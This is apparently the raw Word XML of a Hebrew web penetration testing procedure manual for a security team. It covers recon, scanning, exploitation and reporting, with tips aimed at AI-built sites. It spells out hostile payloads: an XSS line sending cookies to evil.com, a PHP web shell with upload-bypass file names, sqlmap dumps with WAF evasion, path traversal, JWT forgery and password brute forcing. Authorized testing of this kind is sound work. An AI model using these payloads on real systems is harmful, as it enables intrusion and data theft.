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מדריך בדיקות חדירות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Web Penetration Testing — SOP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A6B7D"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Standard Operating Procedure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="40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מדריך זה מיועד לצוות בדיקות האבטחה בלבד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C62828"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CONFIDENTIAL — NOT FOR DISTRIBUTION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0. לפני שמתחילים — חובה לפני כל בדיקה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3"/>
              <w:left w:val="thick" w:color="C62828" w:sz="12"/>
              <w:bottom w:val="single" w:color="C62828" w:sz="3"/>
              <w:right w:val="single" w:color="C62828" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFEB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🚨  אזהרה: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="5D4037"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">אסור להתחיל שום בדיקה ללא אישור כתוב מהלקוח ו-Scope מוגדר. בדיקה ללא אישור = עבירה פלילית.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0.1 צ'קליסט פתיחה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קבל אישור כתוב (Authorization Letter) חתום ע"י הלקוח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הגדר Scope ברור — אילו דומיינים / IP-ים מותרים לבדיקה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הגדר Out-of-Scope — מה אסור לגעת (שרתי prod חיים, databases ספציפיות, וכו')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קבע Rules of Engagement — שעות בדיקה מותרות, מה קורה אם מוצאים Critical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פתח קובץ לוג בשם [תאריך]_[שם_לקוח]_pentest_log.txt — תיעד הכל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צור תיקיית עבודה מסודרת: /pentest/[client]/[recon | scan | exploit | report]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0.2 סביבת עבודה מומלצת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Kali Linux — מערכת ההפעלה המומלצת לכל הכלים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Burp Suite Professional — חובה, כל הבדיקות האינטרנטיות עוברות דרכו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VPN / VPS נפרד — בדיקות מ-IP ניטראלי, לא מ-IP הבית/חברה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Firefox עם FoxyProxy — לניתוב ל-Burp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שלב ראשון — Reconnaissance (איסוף מודיעין)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thick" w:color="1565C0" w:sz="12"/>
              <w:bottom w:val="single" w:color="1565C0" w:sz="3"/>
              <w:right w:val="single" w:color="1565C0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מטרה: ללמוד על המטרה בלי ליצור רעש. בשלב זה אנחנו שואלים שאלות, לא תוקפים.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זיהוי טכנולוגיות</w:t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כלים לשימוש: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Wappalyzer — תוסף דפדפן, מזהה Framework, CMS, שרת, שפה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WhatWeb (CLI): whatweb -v https://target.com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BuiltWith — לאתרים ציבוריים, מאגר מידע עשיר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מה לרשום בלוג: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גרסת שרת (Nginx/Apache/IIS + גרסה מדויקת)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שפת backend (PHP, Python, Node.js, .NET)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CMS (WordPress, Joomla, Drupal, מותאם אישית)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JavaScript frameworks (React, Vue, Angular)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CDN ו-WAF (Cloudflare, Akamai, Sucuri)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8C00" w:sz="3"/>
              <w:left w:val="thick" w:color="FF8C00" w:sz="12"/>
              <w:bottom w:val="single" w:color="FF8C00" w:sz="3"/>
              <w:right w:val="single" w:color="FF8C00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 שים לב: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="5D4037"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">אם זוהה Cloudflare — השלב הבא הוא ניסיון למצוא את ה-IP האמיתי דרך DNS history (Shodan, SecurityTrails).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סריקת DNS ותתי-דומיינים</w:t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הרץ לפי הסדר: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Subfinder — מהיר, מאגרים רחבים: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subfinder -d target.com -o subdomains.txt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Amass — עמוק יותר, לוקח זמן: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amass enum -d target.com -o amass_out.txt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Sublist3r — משלים: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sublist3r.py -d target.com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אחרי איסוף תתי-דומיינים — בדוק כל אחד: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האם הוא אקטיבי? (ping / curl)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האם יש עליו dev / staging / old / backup — אלה יהיו הכי חלשים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Subdomain Takeover — בדוק עם Subjack האם יש CNAME לשירות שנמחק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subjack -w subdomains.txt -t 100 -o takeover.txt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סריקת פורטים ושירותים</w:t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הרץ Nmap בשלבים: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סריקה מהירה ראשונה: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nmap -T4 -F target.com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סריקה מלאה עם זיהוי שירותים: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nmap -sV -sC -p- -T4 -oN nmap_full.txt target.com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אם יש פורטים חריגים — נסה להבין מה רץ עליהם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מה לחפש בתוצאות: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פורטי Admin חשופים (8080, 8443, 8888, 9090)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שירותי Database חשופים (3306 MySQL, 5432 Postgres, 27017 MongoDB, 6379 Redis)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FTP (21), Telnet (23) — ישנים ולרוב חלשים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SMB (445) — אם נמצא על שרת ווב, מעניין מאוד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גילוי קבצים וספריות</w:t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הרץ לפי הסדר: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Dirsearch — רחב ומהיר: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dirsearch -u https://target.com -e php,html,js,txt,json -o dirs.txt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Gobuster עם Wordlist גדול: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gobuster dir -u https://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt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FFUF לבדיקה ממוקדת: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ffuf -u https://target.com/FUZZ -w wordlist.txt -mc 200,301,302,403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מה לחפש בתוצאות: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.env — קובץ קריטי! מכיל מפתחות API, סיסמאות DB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.git/ — גיט חשוף מאפשר הורדת קוד המקור המלא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config.php / config.js / settings.py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backup.zip / backup.sql / site.tar.gz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/admin / /administrator / /wp-admin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/api/v1/ / /api/swagger / /api/docs — תיעוד API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phpinfo.php — חושף גרסאות, הגדרות, נתיבים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8C00" w:sz="3"/>
              <w:left w:val="thick" w:color="FF8C00" w:sz="12"/>
              <w:bottom w:val="single" w:color="FF8C00" w:sz="3"/>
              <w:right w:val="single" w:color="FF8C00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 שים לב: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="5D4037"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">אם נמצא /.git/ — הרץ מיד: git-dumper https://target.com/.git/ ./git_dump — תוריד את קוד המקור המלא.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חיפוש מידע ב-OSINT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Shodan.io — חפש ב: hostname:target.com — מוצא שרתים, גרסאות, פורטים חשופים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SecurityTrails — היסטוריית DNS, תתי-דומיינים ישנים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Wayback Machine / web.archive.org — גרסאות ישנות של האתר, קבצים שנמחקו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Google Dorking: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site:target.com filetype:pdf OR filetype:xls OR filetype:doc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site:target.com inurl:admin OR inurl:login OR inurl:panel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site:target.com "error" OR "exception" OR "stack trace"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שלב שני — Vulnerability Scanning (סריקת חולשות)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thick" w:color="1565C0" w:sz="12"/>
              <w:bottom w:val="single" w:color="1565C0" w:sz="3"/>
              <w:right w:val="single" w:color="1565C0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מטרה: מציאה שיטתית של חולשות ידועות. בשלב זה אנחנו יוצרים רשימת 'חורים' לפני שאנחנו נכנסים דרכם.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סריקה עם Burp Suite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הגדר ב-Firefox: FoxyProxy → Burp (127.0.0.1:8080)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בתוך Burp → Target → Scope: הוסף את הדומיין של המטרה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גלוש בכל חלקי האתר בצורה ידנית — Burp מתעד הכל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לחץ Scanner → New Scan → בחר Active Scan על כל ה-Scope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בסיום — ייצא Results לקובץ XML/HTML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מה לאסוף ב-Burp Proxy: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כל Request/Response לכל endpoint ב-API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Cookies ו-Headers (חפש: Authorization, X-Auth-Token, Session)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פרמטרים נסתרים בגוף ה-POST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סריקת WordPress — WPScan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8C00" w:sz="3"/>
              <w:left w:val="thick" w:color="FF8C00" w:sz="12"/>
              <w:bottom w:val="single" w:color="FF8C00" w:sz="3"/>
              <w:right w:val="single" w:color="FF8C00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 שים לב: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="5D4037"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">אם האתר נבנה על WordPress — זו בדיקה חובה. רוב אתרי ה-AI נבנים על WP.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סריקה בסיסית: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wpscan --url https://target.com --enumerate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סריקה עם API Key (מוצאת CVEs עדכניים):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wpscan --url https://target.com --enumerate u,p,vp,vt,cb,dbe --api-token YOUR_API_KEY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Brute Force על משתמשים שנמצאו (רק אם הותר!):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wpscan --url https://target.com -U users.txt -P /usr/share/wordlists/rockyou.txt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מה WPScan מחפש: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Plugins לא מעודכנים עם CVE ידוע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Themes פגיעים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משתמש admin עם שם ידוע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XML-RPC מופעל (ניתן לניצול ל-DDoS / Brute)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Readme.html חשוף (חושף גרסה)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סריקה עם Nuclei</w:t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Nuclei הוא הכלי הכי טוב לאיתור CVEs ידועים וחולשות נפוצות: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עדכן תבניות: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nuclei -update-templates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סריקה מלאה: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nuclei -u https://target.com -t /root/nuclei-templates/ -o nuclei_results.txt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ממוקד לחולשות קריטיות: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nuclei -u https://target.com -severity critical,high -o critical_findings.txt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סריקת SSL/TLS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testssl.sh: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testssl.sh https://target.com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SSL Labs API (אונליין):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curl -s https://api.ssllabs.com/api/v3/analyze?host=target.com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מה לחפש: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TLS 1.0 / 1.1 פעיל — חולשה Medium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SSLv3 פעיל — חולשה High (POODLE)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אלגוריתמי הצפנה חלשים (RC4, 3DES)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HSTS לא מוגדר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Certificate Expiry קרוב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עץ החלטות — מה עושים עם כל ממצא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thick" w:color="1565C0" w:sz="12"/>
              <w:bottom w:val="single" w:color="1565C0" w:sz="3"/>
              <w:right w:val="single" w:color="1565C0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זהו הלב של המדריך. לכל ממצא מהשלבים הקודמים — כאן תוצא את הפעולה הבאה.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טבלת החלטות מרכזית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ממצא</w:t>
            </w:r>
          </w:p>
        </w:tc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כלי הבא</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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פעולה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SQL Injection (פרמטר חשוד)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SQLMap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שלוף DB names ← Tables ← Columns ←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XSS Reflected / Stored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XSStrike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הוכח גניבת Cookie / Session Hijacking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תיקייה חשופה (.git, .env)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Git-Dumper / curl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הורד קבצי קוד/קונפיגורציה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פורט Admin חשוף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Burp / Hydra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בדוק לוגין Default ← Brute Force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גרסה ישנה עם CVE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SearchSploit / Metasploit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מצא Exploit מתאים, הוכח RCE/LFI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File Upload קיים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Weevely / Manual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נסה upload PHP Shell מוסווה כתמונה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API Endpoint גלוי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Postman / Burp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BOLA: גש ל-/api/user/2 כשאתה User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SSRF חשוד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Burp Collaborator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שלח request לשרת מחוץ עם רישום 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CORS מוגדר רע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Burp / curl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Origins לא מוגבלים ← Cookie theft PoC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JWT Token בשימוש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jwt.io / jwt_tool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None algorithm, weak secret, alg confusion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Rate Limiting חסר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Burp Intruder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OTP Brute Force, Password Spray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Open Redirect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Manual + Burp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02020"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">redirect_uri ל-evil.com ← Phishing PoC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SQL Injection — תהליך מלא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זהה פרמטר חשוד (GET/POST):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https://target.com/page?id=1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בדיקה ידנית ראשונה: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id=1'   →  שגיאת SQL = חיובי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id=1 AND 1=1   →  תקין = חיובי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id=1 AND 1=2   →  שגיאה = חיובי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הרץ SQLMap עם הרמה הנמוכה ביותר קודם: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sqlmap -u "https://target.com/page?id=1" --level=1 --risk=1 --dbs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אם נמצאה DB — המשך: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sqlmap -u "https://target.com/page?id=1" -D [db_name] --tables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sqlmap -u "https://target.com/page?id=1" -D [db_name] -T users --dump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אם ה-WAF חוסם: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sqlmap ... --tamper=space2comment,between,randomcase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8C00" w:sz="3"/>
              <w:left w:val="thick" w:color="FF8C00" w:sz="12"/>
              <w:bottom w:val="single" w:color="FF8C00" w:sz="3"/>
              <w:right w:val="single" w:color="FF8C00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 שים לב: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="5D4037"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">עצור ברגע שהוכחת שאפשר לשלוף נתונים. אין צורך לרוקן את כל ה-DB — זה PoC, לא גניבת מידע.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XSS — תהליך מלא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מצא שדה קלט שמוחזר לדף (Reflected) או נשמר (Stored)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בדיקה ידנית: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&lt;script&gt;alert(1)&lt;/script&gt;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&lt;img src=x onerror=alert(1)&gt;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javascript:alert(1)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אם הפשוט חסום — הרץ XSStrike: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xsstrike.py -u "https://target.com/search?q=test"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Stored XSS — PoC לגניבת Cookie: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&lt;script&gt;document.location='https://evil.com/steal?c='+document.cookie&lt;/script&gt;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תעד: Payload שעבד + צילום מסך + Cookie שנגנב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בדיקות IDOR / BOLA (ממצאים נפוצים ב-AI-built apps)</w:t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IDOR = Insecure Direct Object Reference. אחת החולשות הנפוצות ביותר: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מצא endpoint שמחזיר נתוני משתמש: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GET /api/v1/user/profile/123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שנה את ה-ID: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GET /api/v1/user/profile/124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GET /api/v1/user/profile/1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אם קיבלת נתוני משתמש אחר — זה IDOR/BOLA קריטי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אוטומציה עם Burp Intruder — range 1-1000, חפש responses שמכילים email/name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8C00" w:sz="3"/>
              <w:left w:val="thick" w:color="FF8C00" w:sz="12"/>
              <w:bottom w:val="single" w:color="FF8C00" w:sz="3"/>
              <w:right w:val="single" w:color="FF8C00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 שים לב: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="5D4037"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">קוד שנכתב ע"י AI נוטה לבדוק 'האם המשתמש מחובר?' אבל לא 'האם המשתמש רשאי לראות את המשאב הזה?'. IDOR יהיה מאוד נפוץ.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File Upload — תהליך מלא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בדוק מה סוגי קבצים מותרים להעלאה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נסה להעלות PHP Shell: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&lt;?php system($_GET['cmd']); ?&gt;  →  שמור כ: shell.php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אם חסום על .php — נסה עוקפים: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shell.php5 / shell.phtml / shell.php.jpg / shell.PHP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Double Extension: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shell.jpg.php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שנה Content-Type ב-Burp: image/jpeg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אם הצלחת להעלות — מצא את הנתיב וגש ל-Shell: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https://target.com/uploads/shell.php?cmd=id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בדיקות ייחודיות לאתרים שנבנו ע"י AI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3"/>
              <w:left w:val="thick" w:color="C62828" w:sz="12"/>
              <w:bottom w:val="single" w:color="C62828" w:sz="3"/>
              <w:right w:val="single" w:color="C62828" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFEB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🚨  אזהרה: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="5D4037"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">אתרים שנבנו עם AI סובלים מתבניות חולשה אופייניות. התמקד בסעיפים אלה תמיד.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Hardcoded Secrets</w:t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AI שוכח לעיתים קרובות לשים מפתחות ב-.env ומשאיר אותם בקוד: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פתח Developer Tools → Sources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חפש בקוד JS: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Ctrl+F: key, secret, password, token, apikey, private, aws, firebase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בדוק קבצי .env, config.*, settings.*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GitHub Dorking — אם הקוד גלוי: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"target.com" AND ("api_key" OR "secret" OR "password")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TruffleHog — סריקת Git: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trufflehog --regex --entropy=False https://github.com/target/repo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Missing Authorization Checks</w:t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AI לרוב כותב Authentication (זיהוי) אבל שוכח Authorization (הרשאה):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גלוש כ-Admin ואסוף כל ה-URLs (Burp Site Map)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התנתק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נסה לגשת ל-URLs האלה ישירות כמשתמש אנונימי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Forced Browsing — נסה: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/admin/users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/admin/settings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/dashboard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/export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/backup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השתמש ב-Burp → Autorize Extension — אוטומציה של בדיקות הרשאה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Mass Assignment</w:t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AI לעיתים חושף כל fields של Object ל-API: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מצא POST request ליצירת משתמש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הוסף fields נוספים שלא בטופס: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{"username":"test","password":"123","role":"admin","isAdmin":true}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בדוק אם ה-role שונה במסד הנתונים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Error Information Disclosure</w:t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AI לרוב משאיר Stack Traces חשופים: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שלח input לא תקין לכל שדה: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' OR 1=1-- (SQLi test)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../../../../etc/passwd (Path traversal test)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{{{7*7}}} (SSTI test — אם מחזיר 49, יש SSTI)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הסתכל על Error messages — מחפשים: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נתיבי קבצים (/home/ubuntu/app/models/User.php)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שמות טבלאות ו-Queries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Stack trace עם שורות קוד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גרסאות ספציפיות של ספריות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JWT / Authentication Tokens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מצא JWT token (נראה כ: xxxxx.yyyyy.zzzzz)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פענח ב: jwt.io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בדוק Algorithm: None Attack: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שנה alg ל-none → מחק signature → שלח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בדוק Weak Secret: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hashcat -a 0 -m 16500 token.txt /usr/share/wordlists/rockyou.txt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בדוק אם ה-token מכיל role/isAdmin → שנה ונסה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בדיקות ידניות נוספות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Authentication Testing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Password Policy — נסה: 123, password, [שם_האתר]123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Account Lockout — כמה ניסיונות כושלים מנעילים? האם יש בכלל נעילה?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Username Enumeration — האם ה-error שונה בין "משתמש לא קיים" ל-"סיסמה שגויה"?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Remember Me — בדוק מה מאוחסן ב-Cookie כשמסמנים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Password Reset — האם הטוקן ניתן לניחוש? האם פג תוקף?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Multi-Factor — האם ניתן לעקוף? OTP קבוע? OTP ל-Email לא מאומת?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Session Management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Session Fixation — האם ה-Session ID משתנה אחרי Login?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Session Timeout — האם יש Logout אוטומטי?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Secure / HttpOnly Flags — האם ה-Cookies מוגדרים נכון?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בדוק ב-DevTools: Application → Cookies → בדוק Secure, HttpOnly, SameSite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CSRF Protection — בדוק אם יש CSRF Token בכל Form POST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Business Logic Testing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שנה Price ב-Request של סל קניות: price=0.01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שנה Quantity ל-Negative: quantity=-1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Race Condition — שלח שני Requests במקביל (Burp → Repeater → Send to Intruder → שלח 20 בו-זמנית)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Coupon Codes — האם ניתן להשתמש פעמיים? לשתף?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Step Skipping — בתהליך רב-שלבי, נסה לדלג לשלב 3 ישירות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Infrastructure Testing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Default Credentials — נסה: admin/admin, admin/password, root/root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Admin Interfaces חשופות — Kibana (5601), Grafana (3000), phpMyAdmin (9000)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Debug Mode — ?debug=true / ?XDEBUG_SESSION_START=1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Backup Files — נסה: index.php.bak / wp-config.php~ / .DS_Store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תיעוד ודיווח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thick" w:color="1565C0" w:sz="12"/>
              <w:bottom w:val="single" w:color="1565C0" w:sz="3"/>
              <w:right w:val="single" w:color="1565C0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כלל ברזל: אם לא תיעדת — לא קרה. כל ממצא חייב להיות מתועד לפני שממשיכים.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דרגות חומרה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דרגה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דוגמאות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פעולה נדרשת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🔴  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RCE, SQLi עם Data dump, Auth bypass מלא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הודע ללקוח מיד! תיקון בתוך 24-48 שעות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🟠  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Stored XSS, IDOR על מידע רגיש, SSRF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כלול בדוח הסופי, תיקון בשבוע הקרוב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🟡  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57F17"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Reflected XSS, Missing Security Headers, CSRF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57F17"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">תיקון בחודש הקרוב, כולל בדוח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🟢  Low / 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Version disclosure, Missing HSTS, Weak cipher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כולל בנספח הדוח, תיקון כשיש זמן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תבנית לכל ממצא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שדה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תוכן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כותרת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 ב-/search?q=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דרגת חומרה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 / High / Medium / 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9.8 / AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H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/ Endpoint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https://target.com/search?q=test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 (GET)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תיאור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הפרמטר q מועבר ישירות ל-Query ללא sanitization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Proof of Concept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q=1' OR '1'='1 → מחזיר כל הרשומות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השפעה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חשיפת כל מסד הנתונים, עקיפת Authentication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המלצת תיקון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השתמש ב-Parameterized Queries / Prepared Statements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OWASP Reference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A03:2021 – Injection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רשימת ציוד — Screenshots חובה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צילום מסך של ה-Request המקורי ב-Burp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צילום מסך של ה-Response עם הוכחת ניצול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אם יש Data dump — רשום 3 שורות ראשונות בלבד (לא כל ה-DB)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אם יש Shell — הרץ: id, whoami, uname -a, hostname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כל צילום מסך → שמור כ: [חומרה]_[שם_ממצא]_[תאריך].png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צ'קליסט מלא — לסמן לפני סגירת בדיקה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שלב Reconnaissance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זיהוי טכנולוגיות (Wappalyzer/WhatWeb)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תתי-דומיינים (Subfinder + Amass)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Subdomain Takeover (Subjack)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סריקת Ports (Nmap)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גילוי ספריות (Dirsearch + Gobuster)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OSINT (Shodan + Google Dorks)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חיפוש .git חשוף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חיפוש .env חשוף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שלב Scanning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Burp Suite Active Scan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Nuclei Full Scan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WPScan (אם WordPress)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SSL/TLS Check (testssl.sh)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בדיקות ידניות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SQL Injection — כל פרמטרי GET/POST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XSS — כל שדות קלט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IDOR/BOLA — כל API endpoints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File Upload — אם קיים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Authentication — Password policy, Lockout, Enumeration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Session — Fixation, Timeout, Flags, CSRF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JWT Testing (אם קיים)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Mass Assignment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Error Disclosure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Hardcoded Secrets (JS/Config files)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Authorization Checks (Forced Browsing)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Business Logic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תיעוד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כל ממצא מתועד בתבנית המלאה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Screenshots לכל ממצא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CVSS Score לכל ממצא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המלצת תיקון לכל ממצא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הדוח הסופי נכתב ועבר QA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עמוד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מתוך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jc w:val="right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מדריך בדיקות חדירות — SOP</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="C62828"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">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2026-04-17T12:32:35.894Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-17T12:32:35.895Z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